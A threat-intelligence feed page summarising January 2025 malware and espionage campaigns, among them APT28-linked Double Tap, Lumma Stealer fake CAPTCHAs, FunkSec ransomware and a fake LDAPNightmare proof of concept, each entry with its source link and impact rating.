Impact:
MEDIUM
Summary:
Researchers from Sekoia have uncovered a cyber espionage campaign called Double Tap conducted by UAC-0063, a Russia-linked hacking group associated with APT28 (GRU). The campaign involved legitimate document from Kazakhstan's Ministry of Foreign Affairs by adding malicious Word documents to target Central Aisa. The attacker uses macro embedded word document to which install HATVIBE, a backdoor that downloads and executes additional payloads and a more advanced Python-based backdoor called CHERRYSPY. The purpose of this operation is to gather intelligence on Kazakhstan’s diplomatic relations and geopolitical activities such as its economic partnerships with Western countries and China and its role in the Middle Corridor trade route in Central Aisa.
Source: https://blog.sekoia.io/double-tap-campaign-russia-nexus-apt-possibly-related-to-apt28-conducts-cyber-espionage-on-central-asia-and-kazakhstan-diplomatic-relations/
2025-01-15
CVE_2017_0199_Exploit_Campaign_Targets_with_RATs
LOW
+
Intel Source:
https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-10-IOCs-for-CVE-2017-0199-XLS-infection-chain.txt
Intel Name:
CVE_2017_0199_Exploit_Campaign_Targets_with_RATs
Date of Scan:
2025-01-15
Impact:
LOW
Summary:
Criminals have been exploiting CVE-2017-0199 through malicious Microsoft Office documents for years, targeting outdated systems. Despite this, new exploit samples continue to appear regularly. A campaign active since 2023 or earlier primarily distributes DBatLoader/GuLoader-style malware, which is delivered via a .NET DLL embedded in an image using steganography and reversed base64 encoding. Recent variations of the malware have been linked to remote access tools (RATs) like AgentTelsa, Formbook (XLoader), LokiBot, and Remcos.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-10-IOCs-for-CVE-2017-0199-XLS-infection-chain.txt
2025-01-13
Lumma_Stealer_Uses_Fake_CAPTCHAs_to_Spread_Malware
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Lumma_Stealer_Uses_Fake_CAPTCHAs_to_Spread_Malware
Date of Scan:
2025-01-13
Impact:
LOW
Summary:
Lumma Stealer malware is using fake CAPTCHA challenges to deceive users into executing malicious scripts. In a campaign observed by CERT-AGID in October 2024, victims were misled by a fake CAPTCHA warning about a security issue with their GitHub repositories. Following the CAPTCHA's instructions led to executing a PowerShell script that infected systems with Lumma Stealer. Additionally, an Italian domain running outdated WordPress was compromised to spread the malware through a hidden Base64-encoded JavaScript that generated a fake CAPTCHA for Windows users. Executing the script triggered the malware download and installation.
Source: https://cert-agid.gov.it/news/analisi-di-una-campagna-lumma-stealer-con-falso-captcha-condotta-attraverso-domino-italiano-compromesso/
2025-01-13
FunkSec_Ransomware_Group
LOW
+
Intel Source:
CheckPoint
Intel Name:
FunkSec_Ransomware_Group
Date of Scan:
2025-01-13
Impact:
LOW
Summary:
Checkpoint researchers have uncovered a new ransomware group called FunkSec that first emerged in 2024 and operates as a Ransomware-as-a-Service (RaaS) group. This group has compromised 85 victims in just one month activity. They do combine activity of cybercrime and hacktivism which makes unclear their motives. They employ on double extortion tactics where they steal sensitive data and encrypt victims’ files for demanding a ransom to restore access. Their operations are run by inexperienced attackers by leveraging AI tool to develop their malware. They target organisations in India and the U.S. that often connecting their attacks to political causes like the Free Palestine movement.
Source: https://research.checkpoint.com/2025/funksec-alleged-top-ransomware-group-powered-by-ai/
2025-01-12
Banshee_MacOS_Stealer
LOW
+
Intel Source:
Checkpoint
Intel Name:
Banshee_MacOS_Stealer
Date of Scan:
2025-01-12
Impact:
LOW
Summary:
Researchers at Check Point have identified a MacOS malware called Banshee which targets MacOS users to steal sensitive information such as browser credentials, cryptocurrency wallet data and files. It first appeared in July 2024 and is operated by Russian speaking cybercriminals as a stealer-as-a-service on platforms like Telegram and dark web forums (XSS and Exploit). The advanced version of this malware adds string encryption instead of plain text which has been copied from Apple’s XProtect antivirus. It is distributed through phishing emails and malicious GitHub repositories. This malware is capable of stealing data from popular browsers like Chrome, Brave, Edge, and Opera, as well as extensions related to cryptocurrency wallets and two-factor authentication tools.
Source: https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/
2025-01-12
Malware_Spread_via_Fake_Installers_on_Social_Media
LOW
+
Intel Source:
Trend Micro
Intel Name:
Malware_Spread_via_Fake_Installers_on_Social_Media
Date of Scan:
2025-01-12
Impact:
LOW
Summary:
Researchers at Trend Micro have observed the growing threat of attackers using platforms like YouTube and social media to share links for fake installers that lead to malicious sites. These malicious downloads are often hosted on reputable services like Mediafire and Mega.nz to evade detection. Many of these downloads are password-protected and encoded, making them difficult for security tools to analyze. Once installed, the malware steals sensitive data, including web browser credentials. It highlights how attackers exploit piracy and pose as legitimate software guides on YouTube to trick users into clicking harmful links, ultimately compromising their devices and promoting a culture of theft.
Source: https://www.trendmicro.com/en_us/research/25/a/how-cracks-and-installers-bring-malware-to-your-device.html
2025-01-12
RedCurl_Cyberespionage_in_Canada
MEDIUM
+
Intel Source:
Huntress
Intel Name:
RedCurl_Cyberespionage_in_Canada
Date of Scan:
2025-01-12
Impact:
MEDIUM
Summary:
Researchers at Huntress have discovered cyberespionage activity targeting various Canadian organizations, which they connect to the APT group RedCurl (also known as Earth Kapre or Red Wolf). RedCurl, which has been active since at least November 2023, uses new and developing strategies to get access to and exfiltrate sensitive material, such as emails and company records, while avoiding detection.
Source: https://www.huntress.com/blog/the-hunt-for-redcurl-2
2025-01-11
TA397_Bitter_APT_Espionage_Campaigns
LOW
+
Intel Source:
Cyfirma
Intel Name:
TA397_Bitter_APT_Espionage_Campaigns
Date of Scan:
2025-01-11
Impact:
LOW
Summary:
Researchers at Cyfirma have discovered that TA397, also known as Bitter, is a South Asian cyber espionage group that targets government, energy, telecommunications, defense, and engineering corporations in the EMEA and APAC regions. TA397 uses complex tactics to deliver payloads, including as RAR archives containing alternate data streams (ADS) and decoy files.
Source: https://www.cyfirma.com/research/apt-profile-ta397/
2025-01-11
CrowdStrike_Recruitment_Phishing_Scam
LOW
+
Intel Source:
CrowdStrike
Intel Name:
CrowdStrike_Recruitment_Phishing_Scam
Date of Scan:
2025-01-11
Impact:
LOW
Summary:
On January 7, 2025, CrowdStrike reported a phishing campaign using its recruitment branding to distribute malware. The attack starts with a phishing email impersonating CrowdStrike's recruitment team, leading victims to a malicious website. There, they are tricked into downloading a fake "employee CRM application," which serves as a downloader for the XMRig cryptominer.
Source: https://www.crowdstrike.com/en-us/blog/recruitment-phishing-scam-imitates-crowdstrike-hiring-process/
2025-01-11
Hexalocker_Ransomware_V2
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Hexalocker_Ransomware_V2
Date of Scan:
2025-01-11
Impact:
MEDIUM
Summary:
Cyble researcher have uncovered a HexaLocker ransomware that first emerged in 2024 with its version 2 update. This version has multiple functionalities that modifies registry keys and creates run entries to ensure the malware executes even after a system reboot. It employs double extortion tactic by exfiltrating sensitive information before encryption and force victims to pay for both data recovery and confidentiality. The ransomware uses advanced ChaCha20 for encrypting file and incorporates the Skuld stealer, which steals browser data, cookies, saved credit card details, login credentials, and cryptocurrency wallet information. The attackers use [.]HexaLockerv2 extension and communicate with the victims through a unique hash instead of the previously used traditional methods.
Source: https://cyble.com/blog/hexalocker-v2-being-proliferated-by-skuld-stealer/
2025-01-10
Fake_PoC_Exploit_for_LDAPNightmare
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Fake_PoC_Exploit_for_LDAPNightmare
Date of Scan:
2025-01-10
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have discovered an invalid proof-of-concept (PoC) attack for CVE-2024-49113 (LDAPNightmare) being exploited to transmit information-stealing malware. This vulnerability, a denial-of-service weakness in Microsoft LDAP, was addressed in December 2024, along with CVE-2024-49112, a remote code execution bug. The malicious repository, masquerading as a valid Python-based PoC, replaced the original files with a UPX-packed executable (poc.exe), posing serious threats to security researchers and companies.
Source: https://www.trendmicro.com/en_us/research/25/a/information-stealer-masquerades-as-ldapnightmare-poc-exploit.html